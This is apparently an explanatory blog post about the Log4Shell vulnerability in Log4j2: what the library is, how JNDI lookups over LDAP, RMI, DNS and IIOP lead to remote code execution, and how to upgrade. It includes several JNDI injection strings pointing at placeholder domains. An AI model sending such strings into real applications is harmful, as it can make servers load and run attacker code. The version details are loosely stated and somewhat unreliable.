Before understanding the Log4j2 vulnerability let’s take a look what is Log4j2?
What Is Log4j2 ?
Log4j2 is an open source, Java based library or framework used for logging. Log4j is used by developers to keep track of what happens in their software applications or online services. Log4j2 is distributed by the Apache Software Foundation, it offered a plugin architecture which makes it more extensible than its previous library. It has been downloaded millions of times and is among the most widely used tools to collect information across corporate computer networks, application and websites.
Advantages of Log4j Framework
- Simplified configuration syntax
- Log4j 2 supports a plugin system to let users define and configure custom components
- Support for multiple APIs
- Support for xml, json, yaml and properties configurations
- Support for user-defined Message objects
- Log4j library reduces the need for kernel locking and increases the logging performance, for example Log4j2 can write more than 18 million messages per second, whereas other frameworks like Logback and Log4j1 just write below 2 million messages per second.
What is the Log4j2 vulnerability (Log4Shell)?
On 9 December 2021, a zero-day vulnerability involving remote code execution in Log4j 2 was published by the Alibaba Cloud Security Team and given the name “Log4Shell“. It is described as the most critical vulnerability of the last decade. The vulnerability has been reported with CVE 2021-44228 against the log4j-core jar. CVE 2021-44228 is considered a critical flaw and has a base CVSS score of 10, the highest possible severity rating.
Who is impacted by Log4j2 vulnerability?
Almost all applications and websites are vulnerable to this exploit as log4j is an open source and most common used Java based logging utility. Commercial services like Amazon AWS, Cloudflare, iCloud, Steam, Tencent QQ and many others are impacted by this vulnerability and application like Minecraft and twitter have been found to be vulnerable. Remember not all versions of Log4j library to vulnerable. Only Log4j2 to Log4j2.14.1 versions library are vulnerable.
How the exploit work?
The exploit works when there is a service or application running with vulnerable version of log4j2 library. The Java Naming and Directory Interface (JNDI) allows for lookup of Java objects at program runtime given a path to their data. JNDI can leverage several directory interfaces, one of these interface is the Lightweight Directory Access Protocol (LDAP), it retrieves the object data as a URL from an appropriate server. JNDI lookup paired with the LDAP protocol, will fetch a specified Java class from a remote source and deserialize it, executing some of the class’s code in the process.
In the default configuration, when logging a string, Log4j2 library performs string substitution on expressions of the form ${prefix:name}. For example, Running: ${java:version} might be converted to Running: Java version 1.5.0_57. When JNDI lookup paired with the LDAP protocol, an arbitrary URL may be queried and loaded as Java object data. ${jndi:ldap://sample.com/file}, for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, a hacker can load and execute malicious code hosted on a public URL. Attackers can also send a request to the application with some poisonous string which will be logged by log4j and while doing it, that code will be executed by the application giving attacker the control of the application and the server.
Besides LDAP, the following protocols may also be used for exploiting this issue. Java Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP) when paired with JNDI.
${jndi:ldaps://sampledomain.com}
${jndi:rmi:// sampledomain.com}
${jndi:dns:// sampledomain.com}
${jndi:iiop:// sampledomain.com}
How to mitigate Log4j2 vulnerability?
- Spot Vulnerable Application: Ask admin/root user/system team to run a search on all server to spot any file with name “log4j2”, then check if this is a vulnerable version of log4j2 library or not.
- Permanent Mitigation: New version 2.15.0 of log4j has been released by apache software foundation on 6 December. It fixed restricting the servers and protocols that may be used for lookups. You can download it from apache log4j webpage and update on your system.
- Upgrading to version 2.15.0 of log4j will also completely shield default configurations from exploitation. But it has a bug, CVE-2021-45046, that allows local or remote code execution in certain non-default configurations. The best way to fix for this vilnerability would be to upgrade your log4j dependencies to a latest version 2.16.0, which completely resolves the issue by disabling JNDI by default and removing support for message lookups.
Related Content
1. What is an IP address?
2. Difference between IPv4 & IPv6.
3. Difference between Public and Private IP Address.
4. What is DHCP Server?
5. What Is DORA Process in DHCP?
6. What is DNS Server and How Its work?
7. What is Ports and Protocols in computer networks?
8. How Proxy Server hides IP Addresses?
9. What is Firewall?
10. How DNS Server related to IP Address?
11. IDS Vs IPS in Security.
12. Difference between Hub, Switch & Router.
Wow, awesome blog layout! How long have you been blogging for? you make blogging look easy. The overall look of your site is excellent, as well as the content!
Thank you for your post.Much thanks again. Really Cool.